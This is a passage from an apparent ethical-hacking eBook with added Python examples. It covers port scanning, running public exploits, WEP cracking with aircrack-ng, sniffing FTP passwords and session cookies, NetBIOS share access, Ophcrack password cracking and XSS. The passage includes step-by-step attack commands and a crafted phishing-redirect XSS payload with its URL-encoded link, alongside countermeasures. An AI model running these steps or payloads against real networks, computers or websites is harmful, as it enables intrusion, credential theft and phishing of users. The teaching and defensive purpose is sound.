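The scan-then-grab step in working code, as an added Python example written for this edition rather than taken from the eBook: it starts a throwaway local server that answers with a constructed Apache banner modelled on the Netcat output above, runs a TCP connect scan over two loopback ports the way Nmap's -sT does, then sends the same HEAD request and parses the Server header. The fake server, its banner and the loopback ports are assumptions so that the script runs offline; against a real target you would point scan_ports and grab_http_banner at its address, with authorization.

```python
import socket
import threading

# Constructed banner, modelled on the Netcat output above; not a real host's response.
FAKE_BANNER = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.0.46 (Unix) (Red Hat/Linux)\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def start_fake_server(banner=FAKE_BANNER):
    """Listen on a random loopback port and answer any request with `banner`.

    Stand-in for the target web server so the example runs offline.
    Returns (listening_socket, port); the serving thread dies with the process.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listening socket closed: stop serving
                return
            with conn:
                conn.settimeout(1.0)
                try:
                    conn.recv(1024)  # read the client's request line(s)
                except OSError:
                    pass
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def reserve_closed_port():
    """Bind without listen(): the port is guaranteed closed, connects are refused."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    return s, s.getsockname()[1]


def scan_ports(host, ports, timeout=0.3):
    """TCP connect scan (what `nmap -sT` does): a completed handshake means open."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_http_banner(host, port, timeout=3.0):
    """Send a minimal HEAD request and return (status_line, headers_dict).

    Header names are lower-cased. The Server header is the version hint an
    attacker is after, and what ServerTokens Prod on Apache would hide.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        data = b""
        while b"\r\n\r\n" not in data:      # read until the end of the headers
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    head = data.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return status, headers


if __name__ == "__main__":
    srv, open_port = start_fake_server()
    closed_sock, closed_port = reserve_closed_port()
    print("open ports:", scan_ports("127.0.0.1", [open_port, closed_port]))
    print(grab_http_banner("127.0.0.1", open_port))
```

The closed port is created by binding a socket without calling listen(), so the kernel answers the connect with a reset; that is the same "closed" verdict Nmap prints, as opposed to "filtered", where a firewall silently drops the SYN and the connect only times out.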

Vulnerabilities Searching

After learning the software and its version, we look up known vulnerabilities in it and exploits for them. If a working exploit is found, it is run against the server; success typically gives control of the service and, from there, often of the server and the websites hosted on it, control panel included. If there is no exploit for that service, move on to another open port and try a different service.

The most popular exploit databases are Milw0rm, SecurityFocus and OSVDB. (Milw0rm has been offline since 2009; its archive, and new exploits, are kept by Exploit-DB.)

Penetration Testing

Penetration testing is the act of evaluating the security of a system or network by actually exploiting its vulnerabilities. It simulates an attack by malicious outsiders or insiders and so determines whether unauthorized or malicious activity is really possible, not merely whether a weakness is present on paper.

Why penetration testing?
• It identifies vulnerabilities that automated vulnerability scanners miss, and confirms which scanner findings are real.
• It determines whether a particular set of attack vectors is feasible.
• It identifies the critical vulnerabilities, the ones that actually lead to compromise.
• It tests the ability of network defenders to detect and respond to the attacks.
• Where agreed with the owner, it tests the stability of the system under load and denial-of-service conditions, and more.

White box vs black box
Penetration tests are classified by how much the tester knows about the system beforehand.
White box: the tester knows everything about the system, such as source code, network diagrams and IP addressing information.
Black box: the tester has no prior knowledge of the infrastructure; the location and extent of the systems must be determined before the analysis can begin.
Gray box: the tester has partial knowledge, for example an ordinary user account or a network diagram but no source code.

Web application penetration testing: used to find web application vulnerabilities such as
• SQL injection
• XSS (cross-site scripting)
• Denial of service (DDoS) weaknesses
• Clickjacking
• Buffer overflows in the server or its modules

Penetration testing tools: tools are used as part of a penetration test to automate certain tasks, improve efficiency and discover issues that would be hard to find by manual analysis alone. As a penetration tester you will need a lot of them, and searching for, downloading and installing each one takes time. You can use a penetration testing distribution instead.

What is a pen testing distribution?
A penetration testing distribution is an open-source operating system (derived from Linux or BSD) that bundles all the applications needed to test the security of a system. It is developed specially for security professionals (pen testers, ethical hackers, forensic officers), e.g. BackTrack 5 Linux.

What is the advantage of a penetration testing distribution?
All the applications required for a security test are gathered in a single operating system, so you do not have to hunt for them, which saves time. Penetration testing distributions are open source and free to use, and you can install one on a pen drive and carry it anywhere.

Procedure
Now let's do a penetration test with the PHP exploit given below.


I think you all know PHP exploits; they are widely used, and they start with <?php and end with ?>. Now suppose you found an exploit for the vulnerable service on OSVDB and want to run it against the server. Follow the steps below:
1. Download and install PHP on your computer; the WAMP package includes a PHP command-line interpreter.
2. Paste the PHP code into Notepad and save it as "exploit.php". Read it carefully before running it: public exploit code is usually written for one specific version, and some of it contains hostile code aimed at the person running it.
3. Open the file, search for the line $address = gethostbyname('192.168.1.110'); and replace 192.168.1.110 with the target's IP address. Save the file in the PHP directory, e.g. C:\wamp\bin\php\php5.2.5 (the exact folder depends on the PHP version WAMP installed).
4. Open CMD (Command Prompt), type cd C:\wamp\bin\php\php5.2.5 and hit Enter.
5. Run the exploit by typing php exploit.php and watch the results. Typing exploit.php on its own only opens the file in whatever program is associated with .php files; it is the php interpreter that executes it.
6. If the exploit worked, the server is compromised. If it did not, the service may be a patched build, the exploit may need adjusting, or the vulnerability may simply not be present on this target.

Exploits are also commonly written in Python (download it from http://www.python.org/download/) and in C/C++, which must be compiled before use.

Countermeasures
1. Keep all your software up to date; most exploits in the databases above target versions for which a patch already exists.
2. Install a good anti-virus program such as AVG or Norton Internet Security.
3. Keep the firewall on so that you can see which programs send data out or accept connections in, and close the ports you do not need.
4. Scan your own systems with a vulnerability scanner to find weaknesses before an attacker does.
5. Stay alert: watch your logs for unexpected scans and connection attempts.

Chapter Six- Wireless Hacking

Nowadays Wi-Fi networks and public hotspots are everywhere. People connect their laptops and PCs to them, usually in colleges and offices, and enjoy high speeds without realizing that using an unknown wireless network exposes their passwords and other useful information to anyone else on that network. In this chapter we discuss the techniques hackers use while connected to, or within range of, wireless networks.

Scanning for Wireless Networks

First of all, scan for wireless networks around you using one of the tools below; pick the one that suits you best. In this case I am choosing NetStumbler.
Best wireless network scanner (2011): NetStumbler (Windows).
Other tools: AirRadar, Kismet (Linux/BSD) and KisMAC (Mac).

Procedure-


1. Download and install NetStumbler from the link above.
2. Run it to find the wireless networks available.
3. The access points in range are listed (screenshot in the original); the green signal indicator shows a stronger, better-quality signal.

Advantages of NetStumbler
It shows each network's MAC address (BSSID), channel number and encryption type as well as its SSID and signal strength.

Types of Encryption


1. Wired Equivalent Privacy (WEP)- The original Wi-Fi encryption, meant to make a wireless link as private as a wired one, which is where the name comes from. It is a weak algorithm: it uses RC4 with a static shared key and a 24-bit initialization vector (IV) that repeats quickly, and a series of published flaws (FMS, KoreK and PTW) let the key be recovered from captured traffic alone. With the tools discussed below a WEP key is cracked in minutes.
2. Wi-Fi Protected Access (WPA/WPA2)- The replacement for WEP and the best option for securing a wireless network. (Do not confuse it with WAP, the Wireless Application Protocol, which is a standard for browsing the web from mobile phones and has nothing to do with Wi-Fi security.) WPA2 cannot be broken by the WEP techniques; an attacker has to capture the four-way handshake and run a dictionary or brute-force attack against the pre-shared key, which takes a long time and, with a long random passphrase, does not finish at all.

Cracking WEP

To crack WEP easily, all you need is a live Linux distribution called BackTrack. Its latest version is 5.0; you can download it from http://www.backtracklinux.org/downloads/ . BackTrack provides easy access to a comprehensive collection of security-related tools ranging from port scanners to password crackers. Live CD and live USB support let you boot BackTrack directly from portable media without installing it, although permanent installation to hard disk is also an option. BackTrack includes many well-known security tools:
• Metasploit
• RFMON/injection-capable wireless drivers
• Kismet
• Nmap
• Wireshark (formerly Ethereal)
• Hydra
• Ophcrack
• BeEF (Browser Exploitation Framework)
• Ettercap
• Cisco OCS Mass Scanner, a fast scanner for Cisco routers with default telnet/enable passwords
• Quypt (terminal emulator)
• A large collection of exploits, plus commonplace software such as browsers.

Requirements
You will need a wireless adapter that supports monitor mode and packet injection, a nearby WEP-enabled Wi-Fi network that you own or have permission to test, and BackTrack on a live CD or USB stick.

Procedure
Launch Konsole, BackTrack's terminal; it is on the taskbar in the lower left corner, second button from the left. Now the commands. First get a list of your wireless interfaces:
airmon-ng
The only one I have is labeled ra0. Yours may be different; note the label, and from here on substitute it wherever a command says (interface). Now run the following four commands:
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
If these commands report errors, your network adapter most likely does not support monitor mode and will not work for this attack. If they succeed, you have "faked" a new MAC address, 00:11:22:33:44:55, on your interface, and airmon-ng has put the card into monitor mode (on many drivers it creates a separate monitor interface, often named mon0; if it does, use that name in the commands that follow).

Now pick your network:
airodump-ng (interface)
This lists the wireless networks around you. When you see the one you want, press Ctrl+C to stop the listing. Note two things from its row: its BSSID and its channel (in the column labeled CH). Obviously the network you crack must show WEP in the ENC column, not WPA or anything else. (I had to restart the listing once or twice to find the network I was looking for.) Copy the BSSID to the clipboard for reuse in the next commands. Now watch that network and capture its traffic to a file:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
where (channel) is the network's channel and (bssid) is the BSSID you copied; Shift+Insert pastes it into the command. Use anything descriptive for (file name); I chose "yoyo", the name of the network I am cracking.

Leave that window running. Open a second Konsole window and associate with the access point using the fake MAC address:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Here (essid) is the access point's SSID, in my case yoyo. What you want is the reassuring "Association successful" message with the smiley face. You are almost there. Now start the ARP replay attack:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
This replays captured ARP requests back at the router so that it answers with new encrypted packets carrying fresh IVs, which is what speeds up the crack. After a few minutes the capture window will start filling with read/write packets. (While this was running I was unable to browse the web from another computer on the yoyo network; the injection generates a lot of traffic.)

Here you may have to get a cup of coffee or take a walk: you need enough data before the crack will work. Watch the #Data column in the airodump-ng window; you want it above 10,000 (in my run it was only at 854 at this point). Depending on the signal strength (the PWR column, in dBm; values closer to zero are stronger) this can take a while. Wait until #Data passes 10k, because the crack will fail with less; you may need more than 10k, though that is a working threshold for many networks, and the PTW attack used by current aircrack-ng often succeeds with fewer when ARP packets were replayed.

Once you have enough data, it is the moment of truth. Open a third Konsole window and run aircrack-ng on the capture:
aircrack-ng -b (bssid) (file name)-01.cap
The file name is whatever you entered above with -01.cap appended; airodump-ng saved it in your home directory. If you did not collect enough data, aircrack-ng fails and tells you to try again with more packets. If it succeeds, the WEP key appears next to "KEY FOUND!" as hex bytes separated by colons. Drop the colons and enter the hex key to join the network. Enjoy...
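Why the #Data counter matters, as an added Python example written for this edition and not taken from the eBook or from aircrack-ng: WEP encrypts every frame with RC4 keyed by the 3-byte IV followed by the shared key, and the IV is sent in the clear. The toy below (RC4, CRC-32 ICV and the IV||key construction are WEP's real design; the 40-bit key, the IV and the two frame payloads are constructed) shows the simplest consequence: two frames under the same IV share a keystream, so knowing the plaintext of one (ARP and DHCP headers are predictable) decrypts the other without the key, and a simulation shows how few frames a random 24-bit IV survives before repeating. The key-recovery attacks aircrack-ng actually runs (FMS/KoreK/PTW) are statistical refinements of this same weakness and are not implemented here.

```python
import random
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP keys RC4 with IV || shared key per frame."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Toy WEP frame body: IV (3 bytes, in clear) || RC4(IV||key) xor (data || CRC-32 ICV)."""
    assert len(iv) == 3
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    body = plaintext + icv
    return iv + xor_bytes(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: strip IV, decrypt, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    plain = xor_bytes(body, rc4_keystream(iv + key, len(body)))
    data, icv = plain[:-4], plain[-4:]
    if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch")
    return data


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Attacker side, no key needed: if a frame's plaintext is known,
    ciphertext xor plaintext is the RC4 keystream for that IV."""
    iv, body = frame[:3], frame[3:]
    return iv, xor_bytes(body, known_plaintext)


def decrypt_with_reused_iv(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Any other frame sent under the same IV used the same keystream."""
    if frame[:3] != iv:
        raise ValueError("different IV; this keystream does not apply")
    return xor_bytes(frame[3:], keystream)


def frames_until_iv_repeat(seed: int = 0) -> int:
    """Simulate an AP drawing random 24-bit IVs; count frames until one repeats.
    The birthday bound puts this near sqrt(2**24), about 4096 frames, i.e.
    seconds of traffic on a busy network."""
    rng = random.Random(seed)
    seen = set()
    sent = 0
    while True:
        iv = rng.randrange(1 << 24)
        sent += 1
        if iv in seen:
            return sent
        seen.add(iv)


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")              # constructed 40-bit WEP key
    iv = bytes.fromhex("0a0b0c")                   # constructed IV
    f1 = wep_encrypt(key, iv, b"ARP header known to the attacker")
    f2 = wep_encrypt(key, iv, b"another station's secret payload")
    _, ks = recover_keystream(f1, b"ARP header known to the attacker")
    print(decrypt_with_reused_iv(f2, iv, ks))
    print("frames before first IV repeat:", frames_until_iv_repeat())
```

The CRC-32 ICV does nothing to stop this: it is linear and keyed by nothing, so an attacker who can flip plaintext bits can fix up the checksum too, which is the basis of the chopchop and fragmentation attacks in aireplay-ng. WPA2 avoids both problems with a per-session key and a real message integrity check.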


Packet Sniffing

Packet sniffing is the act of capturing packets as they travel through a network. A packet sniffer, sometimes called a network monitor or network analyzer, is used legitimately by network and system administrators to monitor and troubleshoot traffic: with the captured data an administrator can identify malformed packets, pinpoint bottlenecks and keep the network running efficiently. In the hands of an attacker who has joined a wireless network, the same tool intercepts private information passing over the air, such as usernames, passwords, IM conversations and e-mails. Examples are Wireshark and NetworkMiner. Wireshark is the standard packet sniffer: it captures packets as they pass through a network interface and decodes them protocol by protocol. (A screenshot of Wireshark at work appears in the original.)

Procedure
Now let's capture FTP passwords:
1. Download and install Wireshark, and make sure to install WinPcap, which comes with the Wireshark installation package; Wireshark cannot capture without it.
2. Click the Capture button at the top, choose your network interface and start capturing.
3. Type ftp in the filter bar; this shows only FTP control-channel packets.
4. As you scroll down you will see the USER and PASS commands carrying the victim's FTP username and password in clear text, and you are done. FTP sends credentials unencrypted, which is why SFTP or FTPS should be used instead.

Other uses of this tool
1. The same method captures the victim's Facebook session cookies (notably datr), which, injected into Firefox with a cookie-injector add-on, give access to the session without the password. This is known as the FB cookie authentication hack.
2. In the same way Gmail accounts could be hijacked with the GX cookie. Both attacks depend on the site sending its session cookie over plain HTTP; once a site enforces HTTPS for every request, sniffing yields only encrypted traffic.

Please note: on a switched LAN, Wireshark by itself sees only traffic to and from your own machine plus broadcasts, because the switch does not forward other hosts' frames to your port. That is why these wireless examples work (every station on an open or WEP network hears every frame) while a wired LAN needs an extra step: use a tool such as Cain & Abel or Ettercap to ARP-poison the victims so their traffic is routed through you, and then sniff it.
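What the "ftp" filter shows you, turned into detection logic: an added Python example written for this edition, not code from the eBook or from Wireshark. It walks a constructed list of TCP payloads in capture order (the addresses, ports and the ProFTPD-style replies are made up), pairs each flow's USER and PASS commands and records whether the server's 230/530 reply accepted them. The same logic run by an IDS on a mirror port is how a defender alerts on credentials crossing the wire in clear text.

```python
FTP_PORT = 21

# Constructed sample capture, not real traffic: (src_ip, src_port, dst_ip, dst_port, payload)
# in arrival order, i.e. the TCP payloads Wireshark lists after the "ftp" filter.
SAMPLE_PACKETS = [
    ("192.0.2.10", 21, "10.0.0.5", 51514, b"220 ProFTPD Server ready.\r\n"),
    ("10.0.0.5", 51514, "192.0.2.10", 21, b"USER alice\r\n"),
    ("192.0.2.10", 21, "10.0.0.5", 51514, b"331 Password required for alice\r\n"),
    ("10.0.0.5", 51514, "192.0.2.10", 21, b"PASS s3cret!\r\n"),
    ("192.0.2.10", 21, "10.0.0.5", 51514, b"230 User alice logged in\r\n"),
    ("10.0.0.7", 40000, "192.0.2.10", 21, b"USER bob\r\n"),
    ("10.0.0.7", 40000, "192.0.2.10", 21, b"PASS wrong\r\n"),
    ("192.0.2.10", 21, "10.0.0.7", 40000, b"530 Login incorrect.\r\n"),
    ("10.0.0.5", 51514, "192.0.2.10", 21, b"PASS orphan\r\n"),   # PASS without USER: ignored
]


def extract_ftp_logins(packets, ftp_port=FTP_PORT):
    """Reassemble USER/PASS pairs per client flow and mark whether the server accepted them.

    A flow is (client_ip, client_port, server_ip, server_port). Commands travel to
    ftp_port, replies come from it; both directions are matched to the same flow key.
    """
    usernames = {}   # flow -> USER seen, waiting for its PASS
    awaiting = {}    # flow -> index in results, waiting for the 230/530 reply
    results = []
    for src, sport, dst, dport, payload in packets:
        if dport == ftp_port:                         # client -> server command
            flow = (src, sport, dst, dport)
            for line in payload.split(b"\r\n"):
                verb, _, arg = line.partition(b" ")
                verb = verb.upper()
                if verb == b"USER":
                    usernames[flow] = arg.decode("ascii", "replace")
                elif verb == b"PASS" and flow in usernames:
                    results.append({
                        "client": src,
                        "server": dst,
                        "user": usernames.pop(flow),
                        "password": arg.decode("ascii", "replace"),
                        "accepted": None,             # unknown until the server replies
                    })
                    awaiting[flow] = len(results) - 1
        elif sport == ftp_port:                       # server -> client reply
            flow = (dst, dport, src, sport)
            code = payload[:3]
            if flow in awaiting and code in (b"230", b"530"):
                results[awaiting.pop(flow)]["accepted"] = (code == b"230")
    return results


if __name__ == "__main__":
    for hit in extract_ftp_logins(SAMPLE_PACKETS):
        print(hit)
```

Note that nothing here decrypts anything: the credentials are readable because the protocol never protected them. Point the same loop at an SFTP or FTPS flow and the payloads are TLS or SSH records, which is the countermeasure.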

Countermeasures
1) Change the default administrator username and password on the router.
2) Change the default SSID (recommended).
3) Turn on WPA2 encryption with a long, random pre-shared key; use WEP only if an old device leaves you no choice, knowing that it can be cracked as shown above.
4) Disable SSID broadcast.
5) Assign static IP addresses to all devices.
6) Enable MAC address filtering.
7) Turn the network off during extended periods of non-use (optional).
8) Always use SSL/TLS (HTTPS) for logins and mail, so that sniffed traffic is useless.
9) Use a long, secure password for the router's administration page.
Items 4, 5 and 6 only deter casual users: a sniffer sees the SSID and the clients' MAC addresses as soon as anyone connects, and a MAC address can be changed with macchanger as shown above. The encryption in item 3 is what actually keeps an attacker out. I hope you all enjoy it!

Chapter Seven- Windows Hacking

NetBIOS

NetBIOS stands for Network Basic Input Output System. It is the service that lets Windows computers on a LAN or WAN share folders, files, drives and printers, and abusing it is the classic way of getting at another computer's data over the network. Below is a demonstration of how shared data is reached through NetBIOS on a LAN or WAN.

Procedure
1. To perform this attack we need to reach TCP port 139, the NetBIOS session service (Windows 2000 and later offer the same file sharing directly over port 445 as well).
2. Suppose you are on a LAN and want to reach the administrator's computer from yours.
3. Open an IP scanner such as Cain & Abel or Angry IP Scanner.
4. In Cain & Abel, open the Sniffer tab and press the start button.
5. Click the blue + button and select "All hosts in my subnet".
6. Once the scan has finished, note the IP address of the computer you are going after.
7. Open cmd and check whether the target is online: ping (IP address of the target), for example ping 192.168.1.110.
8. If it is online, type nbtstat -a (IP address of target), for example nbtstat -a 192.168.1.110. This prints the target's NetBIOS name table; a <20> entry means the File Server Service is running, i.e. the machine is offering shares.
9. Now list the shares with net view \\(IP address of target), for example net view \\192.168.1.110.
10. To mount one of those shares as a drive on your own computer, type net use G: \\(IP address of target)\(share name), for example net use G: \\192.168.1.110\C, and browse it in Explorer. The hidden administrative shares (C$, ADMIN$) require administrator credentials, and modern Windows versions refuse anonymous (null-session) share listing, so this works only against shares that were deliberately opened to Everyone or where you already hold valid credentials.

That's it!

Cracking Windows Passwords

Nowadays cracking a Windows administrator's password is child's play, because many programs and sites exist to do it. So today I am going to teach you how to crack Windows passwords with Ophcrack, either by installing the software or by booting its live CD. First let me make clear what Ophcrack is: a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables written by the inventors of the method; it comes with a graphical user interface and runs on multiple platforms. Note: the free tables cover Windows XP (LM hashes) and Vista (NTLM hashes), and a password made of characters or lengths outside a table's coverage will not be found.

Features
• Runs on Windows, Linux/Unix, Mac OS X and more.
• Cracks LM and NTLM hashes.
• Free tables available for Windows XP and Vista.
• Brute-force module for simple passwords.
• Audit mode and CSV export.
• Real-time graphs to analyze the passwords.
• Live CD available to simplify the cracking.
• Loads hashes from an encrypted SAM recovered from a Windows partition, Vista included.
• Free and open-source software (GPL).

Steps
Step 1: Go to ophcrack.sourceforge.net, select the Windows Vista or XP live CD and download the ISO file. After the download is complete, burn the ISO to a CD or DVD.
Step 2: Restart the computer with the CD in; it should boot from the live CD into a Linux environment. (If it boots into Windows instead, change the boot order in the BIOS.)
Step 3: Ophcrack runs automatically as soon as the CD boots, reads the password hashes from the Windows partition and starts looking them up in its tables. All you need to do is wait until it has finished; this takes anywhere from ten minutes to several hours depending on the strength of the passwords.
Step 4: Look at the screenshot (in the original) to see how the results are displayed: each account appears with its LM/NTLM hash and, once found, its password.
Step 5: Now that you know the password, reboot the computer, eject the CD and log in with it.

That's it! Knowing the administrator's password gives you complete access to everything on that computer; you could remove parental controls or do whatever you like.

Countermeasures
1. To protect yourself against the NetBIOS attack, disable File and Printer Sharing in the properties of the network connection you use for the Internet, and block ports 139 and 445 at the firewall.
2. To protect yourself against Ophcrack, use a long Windows password that mixes letters, numbers and symbols in a jumbled order, for example KoW07oon$$. LM hashes are the weakest link: Windows does not store one for passwords longer than 14 characters, and they can be switched off entirely by policy. Since the live CD works by reading the SAM file off the disk, full-disk encryption such as BitLocker stops it completely, and so does a BIOS password with booting from CD/USB disabled.

Chapter Eight- Web Hacking

Gone are the days when website hacking was a sophisticated art. Today anybody with Internet access can start hacking a website; all it takes is a Google search for keywords like "how to hack website", "hack into a website" or "hacking a website". This chapter is not an effort to teach you website hacking; it is meant to raise awareness of some common website hacking methods.

How to find a vulnerable website and start hacking?

Nowadays website hacking has become a tradition, or a kind of fun, at other people's expense. Hackers search for holes in websites with high page ranks and traffic. Who knows whether the next target is your site? A few years back there was not so much fear of websites being hacked, because such powerful tools did not exist; now even a newbie can find a vulnerable website with a point-and-click scanner and start hacking.

Audit your website security with Acunetix Web Vulnerability Scanner

Website security is possibly the most overlooked aspect of securing an enterprise today and should be a priority in any organization. Hackers concentrate on web-based applications: shopping carts, forms, login pages, dynamic content and so on. Web applications are reachable 24 hours a day, 7 days a week, and control valuable data because they often have direct access to back-end data such as customer databases. Network-level defenses offer little protection here: firewalls, SSL and locked-down servers do not stop attacks that arrive as ordinary requests on port 80 or 443, which have to remain open. In addition, web applications are often tailor-made and therefore less tested than off-the-shelf software, so they are more likely to contain undiscovered vulnerabilities. Acunetix WVS automatically checks web applications for SQL injection, XSS and other web vulnerabilities.

Commonly used tool to find a vulnerable website: Acunetix

Acunetix is a well-known tool (its vendor calls it the world's best) for finding vulnerabilities in web applications: it automatically checks them for SQL injection, XSS and other web vulnerabilities. Acunetix Web Vulnerability Scanner includes the following features:
• An automatic client script analyzer allowing security testing of Ajax and Web 2.0 applications
• In-depth SQL injection and cross-site scripting testing
• Penetration testing tools such as the HTTP Editor and the HTTP Fuzzer
• A visual macro recorder that makes testing web forms and password-protected areas easy
• Support for pages with CAPTCHA, single sign-on and two-factor authentication
• Extensive reporting, including VISA PCI compliance reports
• A multi-threaded, fast scanner that crawls hundreds of thousands of pages
• An intelligent crawler that detects the web server type and application language
• Crawling and analysis of websites including Flash content, SOAP and AJAX
• Port scanning of the web server and security checks against the network services running on it
Automated scanners also report false positives, so confirm each finding by hand, and scan only sites you own or are authorized to test.

Download Acunetix Web Security Scanner (link in the original).

Cross Site Scripting

Cross-site scripting, or XSS, is a threat to a website's security and one of the most common and popular ways of attacking a site to obtain information from its users. Malicious hackers use it against sites on the Internet, but good hackers mostly use it to find security holes and help site owners fix them. Because the flaw lies in how a site handles input, it is hard to detect and stop, and it leaves the site and its users open to identity theft, financial theft and data theft. XSS occurs when a website copies attacker-controlled input into a page without encoding it, so that the victim's browser executes the attacker's HTML or JavaScript in the context of the trusted site. XSS attacks are very popular and some of the biggest websites have been affected, including those of the FBI, CNN, eBay, Apple, Microsoft and AOL. Website features commonly vulnerable to XSS are:
• Search engines
• Login forms
• Comment fields

There are three types of XSS attacks:
1. Local – Local XSS attacks are by far the rarest and the hardest to pull off; the payload is handled by the page's own client-side script (DOM-based XSS) or relies on a browser vulnerability. With this type of attack the hacker can install worms, spambots and backdoors on your computer.
2. Non-persistent – Non-persistent (reflected) attacks are the most common type and do not change the website itself. They occur when JavaScript (a scripting language used for client-side web development) or HTML is inserted into a request variable and echoed back, changing the output the user sees. A reflected attack fires only when the victim visits a URL crafted by the attacker.
3. Persistent – Persistent (stored) attacks are used against web applications that store user input and display it to others: guest books, forums and shout boxes. Things a hacker can do with a persistent attack include:
• Steal website cookies (cookies are used by browsers to store your user information so you stay logged in after you leave; with your cookie the attacker can sometimes log in without knowing your password).
• Deface the website.
• Spread worms.

Now that you know what cross-site scripting is, how can you tell whether a website is vulnerable to it?
1. If there is a search field, enter a word; if that word is displayed back to you on the next page, there is a chance it is vulnerable.
2. Now insert some HTML. Search for <h1>hi</h1>; if the word "hi" comes out as a big header, the input is not being encoded.
3. Now insert JavaScript. Search for <script>alert("hi");</script>; if the word "hi" pops up in a popup box, the site is vulnerable to XSS.
4. As you can see, these examples are non-persistent. If a hacker found a guest book or something like it that was vulnerable, he could make the attack persistent, and everyone visiting the page would get the above alert if it was part of his comment. Hackers knowledgeable in JavaScript and PHP can craft advanced XSS attacks to steal cookies and spread XSS worms; as a simple but more realistic example, here is how a hacker could use XSS to help with phishing.

1. Say a hacker wants to phish passwords from www.victim-site.com. If he finds an XSS vulnerability anywhere on the site, he can craft a link pointing to the legitimate website that redirects to his phishing website.
2. In the popup example, when the JavaScript was entered in the search box, a URL was formed (shown in the original) in which the code typed into the search box was passed in the "searchbox" variable.
3. In that URL the hacker replaces everything between ?searchbox= and &search with the following JavaScript code:
<script>window.location = "http://phishing-site.com"</script>
4. Now, when the victim follows the finished link, the legitimate site redirects to the phishing website. Next the hacker encodes the URL to make it look more legitimate and less suspicious; this can be done at http://www.encodeurl.com/ .
5. My finished encoded URL is:
http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21
6. Once the victim sees that the link points to the legitimate website, he is more likely to fall for the phishing attack. Done!

Note that the encoding only hides the payload from a human reader; the browser decodes it again before sending the request, so the server receives exactly the script above. That is why the fix has to be output encoding on the server, not rejecting odd-looking URLs.
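The three manual checks and the encoded-link trick above, as an added Python example written for this edition rather than taken from the eBook: a search page rendered the vulnerable way (input copied straight into HTML) beside the hardened way (html.escape on output), a helper that runs the probes from the checks against either renderer, and a builder for the URL-encoded redirect link that then shows what the server receives after the browser decodes it. The page template, the parameter name searchbox and the phishing URL are assumptions modelled on the walkthrough, not a real site.

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed page template standing in for the site's search result page.
PAGE = "<html><body><h2>Results for: {q}</h2></body></html>"


def render_search_vulnerable(query: str) -> str:
    """The flaw behind every reflected XSS: user input copied into HTML as-is."""
    return PAGE.format(q=query)


def render_search_safe(query: str) -> str:
    """The fix: HTML-encode on output. quote=True also encodes ' and " so the
    value is safe inside an attribute, not only in element text."""
    return PAGE.format(q=html.escape(query, quote=True))


# The probes from the three manual checks above.
PROBES = ["hi", "<h1>hi</h1>", '<script>alert("hi");</script>']


def reflection_report(render) -> dict:
    """Run the manual checks against a render function: does each probe come back verbatim?
    Plain text reflecting is normal; markup reflecting unencoded is the vulnerability."""
    return {probe: probe in render(probe) for probe in PROBES}


def build_redirect_link(base_url: str, param: str, phishing_url: str, extra=None) -> str:
    """Step 5 in code: the redirect payload, URL-encoded into the vulnerable parameter.
    Encoding changes how the link looks, not what it does."""
    payload = f'<script>window.location = "{phishing_url}"</script>'
    params = {param: payload}
    params.update(extra or {})
    return base_url + "?" + urlencode(params)


def payload_as_server_sees_it(link: str, param: str) -> str:
    """What the vulnerable server receives once the browser has decoded the query string."""
    return parse_qs(urlparse(link).query)[param][0]


if __name__ == "__main__":
    print("vulnerable:", reflection_report(render_search_vulnerable))
    print("hardened:  ", reflection_report(render_search_safe))
    link = build_redirect_link("http://localhost/form.php", "searchbox",
                               "http://phishing-site.com", {"search": "search!"})
    print(link)
    print(payload_as_server_sees_it(link, "searchbox"))
```

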